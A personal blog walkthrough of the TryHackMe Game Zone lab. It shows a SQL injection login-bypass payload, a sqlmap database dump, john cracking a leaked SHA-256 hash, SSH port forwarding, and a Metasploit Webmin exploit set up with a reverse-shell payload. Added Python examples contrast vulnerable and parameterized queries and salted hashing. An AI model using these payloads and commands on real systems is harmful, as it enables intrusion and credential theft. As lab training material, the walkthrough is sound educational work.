TryHackMe Game Zone Writeup/Walkthrough

Parker Cowan
6 min read · Nov 5, 2021

Welcome back to another writeup! Today we’ll be looking at TryHackMe’s Game Zone. This one is relatively quick and covers some SQLi/SQLmapping as well as some hash cracking! As always, let’s jump right in.

The first thing we’ll be greeted with upon entering the IP into our browser is the following homepage:

If you aren’t familiar with the bald man on the front, obviously you need to go play the Hitman games! Or you can just reverse image search. Your call.

More notably, however, we see some user input boxes for login, password, and site search. We can check whether these are susceptible to SQL injection using some basic SQLi checks. We can attempt to bypass the login authentication using the following payload:

' OR 1=1; -- -

This works because when we enter a username into the login box, the website queries the SQL server with a statement of the following form:

SELECT * FROM users WHERE username = 'foouser' AND password = 'foo'

However, when we enter our payload in place of foouser, the query becomes:

SELECT * FROM users WHERE username = '' OR 1=1-- -' AND password = 'foo'

Notice that our first quotation mark actually closes the original string literal, and the OR 1=1 that follows creates a condition that is always true. Furthermore, the two dashes followed by a space start a SQL comment (the extra trailing dash just makes sure that required space survives), so SQL ignores everything after them. Thus what SQL actually sees is:

SELECT * FROM users WHERE username = '' OR 1=1

This always evaluates to true, and we are able to log in. We are brought to this page:
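As an added example (not part of the original writeup), here is the login check described above in both its string-built and parameterized forms, run against a constructed in-memory SQLite table so you can see the same payload succeed against one and fail against the other:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's users table (one sample row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('foouser', 'foo')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Query built by string formatting, the way the writeup's site does it.

    The attacker's leading quote closes the username literal and the
    trailing comment marker discards the AND password = '...' check.
    """
    query = (f"SELECT * FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the payload is compared as plain text
    against the username column and never reaches the SQL parser."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo() -> dict:
    conn = make_db()
    payload = "' OR 1=1; -- -"          # the payload from the writeup
    return {
        "vuln_bypass": login_vulnerable(conn, payload, "wrongpassword"),
        "vuln_legit": login_vulnerable(conn, "foouser", "foo"),
        "safe_bypass": login_parameterized(conn, payload, "wrongpassword"),
        "safe_legit": login_parameterized(conn, "foouser", "foo"),
    }


if __name__ == "__main__":
    print(demo())
```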

Now it’s time for some more advanced SQL injection using SQLmap. SQLmap is an incredibly useful tool capable of detecting and exploiting SQL injection vulnerabilities. In this case our life is made much easier if we use it in conjunction with Burp Suite. Make sure to set up your proxy in Firefox as follows in order for Burp Suite to work.

Once that is done, open up Burp and let’s set the target scope so we only see requests to our target website. Note that the IP of your machine may be different, of course.

Now we can turn on our proxy and try typing a test search into the new webpage we found.

As we can see, Burp has picked up the request, and we can see our input at the bottom, “searchitem=test”. Right click on the request and click “Copy to file”. We’ll need this request for our SQLmapping. Navigate to the directory you saved it in and then we can run:

sqlmap -r request.txt --dbms=mysql --dump

And SQLmap will begin working its magic. Go along with the prompts until the enumeration is complete. You should get two tables in the output.

Most notably, we see a username and a password hash. Throwing that hash into https://www.tunnelsup.com/hash-analyzer/ gives us the hash type, which matters here because john won’t identify it correctly unless we specify the format. We see it’s SHA-256. Let’s put this hash into a text file and then run it through john.

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256

I was only able to crack this hash using the full rockyou.txt wordlist; I tried each one from rockyou-15.txt all the way to rockyou-70.txt. After it completes we can print the password using:

john --show --format=raw-sha256 hashes.txt
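The dumped hash fell to a wordlist because it was a single, unsalted SHA-256 of the password. As an added example, not from the original writeup, here is that scheme beside a salted PBKDF2 scheme (the iteration count is an assumed value): two accounts sharing a password get identical naive digests, so one crack reveals both and a precomputed wordlist table applies directly, whereas the salted form stores different values and costs hundreds of thousands of hash computations per guess.

```python
import hashlib
import hmac
import os

# Assumed work factor for PBKDF2-HMAC-SHA256; tune to your hardware.
ITERATIONS = 600_000


def naive_sha256(password: str) -> str:
    """Unsalted, single-round SHA-256: the scheme behind the dumped hash."""
    return hashlib.sha256(password.encode()).hexdigest()


def store_password(password: str, salt: bytes = b"") -> str:
    """Salted, iterated hash. Returns 'pbkdf2_sha256$iters$salt_hex$digest_hex'.

    A fresh random salt per user means equal passwords no longer produce
    equal records, so a precomputed table of wordlist hashes is useless.
    """
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def demo() -> dict:
    # Constructed sample: two accounts that happen to share a weak password.
    pw = "password123"
    naive_a, naive_b = naive_sha256(pw), naive_sha256(pw)
    salted_a, salted_b = store_password(pw), store_password(pw)
    return {
        "naive_records_equal": naive_a == naive_b,     # True: one crack hits both
        "salted_records_equal": salted_a == salted_b,  # False: distinct salts
        "salted_verifies": verify_password(pw, salted_a),
        "salted_rejects_wrong": verify_password("Password123", salted_a),
    }


if __name__ == "__main__":
    print(demo())
```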

Now let’s use these new-found credentials and attempt to SSH into the system.

ssh agent47@10.10.147.235

And we’re in!

The user.txt flag is immediately available in /home/agent47. Next, let’s work on further enumerating the system with our shell. Running

ss -tulpn

shows us there is a service listening on port 10000. We can’t reach it from our machine, however, so we need a way to forward this port past the firewall. We can do this through a reverse SSH tunnel. Reverse SSH tunnels are for situations where you need to reach a remote machine with a strict firewall policy from a local machine with a lax firewall policy. In this case, the remote machine is our target and the local machine is our Kali machine. With a reverse tunnel, the remote machine opens the SSH connection to us and asks our side to listen on a port; anything that connects to that port is carried back through the tunnel to the service on the remote machine, effectively forwarding our desired port. All we need to do afterwards is connect to localhost on our new port from our local machine. If that seems kind of confusing, don’t worry, I was confused too. Let’s see it in action and perhaps that will shed more light on the situation.

First, on our local machine, we type the following. This is the local-forward (-L) form: it makes port 10000 on our Kali machine connect, through the SSH session, to port 10000 on the target’s loopback interface, which gives us the same result.

ssh -L 10000:localhost:10000 agent47@10.10.147.235

Note that we can also initiate the tunnel from the target side, which is the true reverse (-R) form. From our first SSH session on the target we would run the following, with <kali-user> and <kali-ip> as placeholders for a user on our Kali machine and its VPN IP:

ssh -R 10000:localhost:10000 <kali-user>@<kali-ip>

However, that requires an SSH server to be set up on our Kali machine, so let’s go with the first option for now.

Now that the tunnel is up, we should be able to access port 10000. Let’s try it in our web browser.

Indeed, we have a new login page. Let’s try the same credentials as before.

And we’re in! Lots of info to get from here. Looks like this is Webmin version 1.58. Plugging this into searchsploit gives us:

Perfect, our first result is in Metasploit and is for our version. Let’s load that up.

msfconsole
msf > use exploit/unix/webapp/webmin_show_cgi_exec
set SSL false
set rhosts localhost
set username agent47
set password *spoiler->redacted*

Next we need to pick a payload. To list available payloads we can do:

I went with payload 5: cmd/unix/reverse. Set LHOST to your VPN IP, and let it rip!

When you load the session it may seem like nothing has happened, but a quick whoami proves the shell is working.

The final flag is found in /root/root.txt.

And that’s all for this one! A fun lab in my opinion, and I had fun learning about reverse SSH port forwarding during this one! I hope this helped anyone who was stuck and please feel free to leave any comments/corrections/suggestions you may have! Thanks!


Parker Cowan

I am an electrical engineering student at the University of British Columbia, who has a passion for cybersecurity and ethical hacking.